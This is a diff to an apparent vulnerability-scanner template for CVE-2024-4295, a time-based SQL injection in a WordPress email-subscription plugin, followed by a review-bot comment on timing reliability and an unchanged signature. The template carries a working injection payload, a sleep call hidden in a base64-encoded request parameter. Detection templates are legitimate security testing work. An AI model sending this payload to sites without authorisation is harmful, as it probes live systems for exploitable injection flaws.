diff --git a/http/cves/2024/CVE-2024-4295.yaml b/http/cves/2024/CVE-2024-4295.yaml index 2379d7f8d1a..b1be12381a7 100644 --- a/http/cves/2024/CVE-2024-4295.yaml +++ b/http/cves/2024/CVE-2024-4295.yaml @@ -31,23 +31,38 @@ info: fofa-query: body="/wp-content/plugins/email-subscribers/" tags: time-based-sqli,cve,cve2024,wordpress,wp-plugin,wp,email-subscribers,sqli +flow: http(1) && http(2) + variables: contact_id: "{{contact_id}}" email: "{{email}}" - rawhash: '{"message_id":0,"campaign_id":0,"contact_id":"{{contact_id}}","email":"{{email}}","guid":"dibwol-qaiebd-qvrgkp-lhyopm-rmyfzo","list_ids":["sleep(3)"],"action":"subscribe"}' + rawhash: '{"message_id":0,"campaign_id":0,"contact_id":"{{contact_id}}","email":"{{email}}","guid":"dibwol-qaiebd-qvrgkp-lhyopm-rmyfzo","list_ids":["sleep(8)"],"action":"subscribe"}' http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/wp-content/plugins/email-subscribers/readme.txt" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'contains_any(body, "email-subscribers-", "Email Subscribers by Icegram Express")' + internal: true + - raw: - | @timeout: 20s GET /?es=optin&hash={{ base64(rawhash) }} HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=8' - 'contains(body, "You have been successfully subscribed")' condition: and -# digest: 4a0a00473045022100ef84d71b771f0dcbd197ffad01746ecd151e0b2003a65b67dcadb27ecd0a473902206ff2fe02e08e414a0195191853ce7d2b232dfacdeea953c89af0b715987fe263:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef84d71b771f0dcbd197ffad01746ecd151e0b2003a65b67dcadb27ecd0a473902206ff2fe02e08e414a0195191853ce7d2b232dfacdeea953c89af0b715987fe263:922c64590222798bb761d5b6d8e72950
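Review bot: The verdict of the second request still rests on a single timing sample: `duration>=8` is the only condition that separates a vulnerable site from a patched one, because the `You have been successfully subscribed` body check presumably also passes on a fixed plugin, so a host that is simply slow for 8 seconds or more would be reported as vulnerable. The new fingerprint request narrows the target set but does not change that. Consider pairing the delayed request with an undelayed baseline in the same `raw` block and comparing the two durations, or at least add a comment above the matcher such as `# single timing sample: confirm manually before reporting`. The `# digest:` value is identical on the removed and added lines although the template body changed, so the signature will presumably not verify until the template is re-signed. The `info:` block starts above this hunk, so whether `max-request` there was updated for the extra requests cannot be checked here.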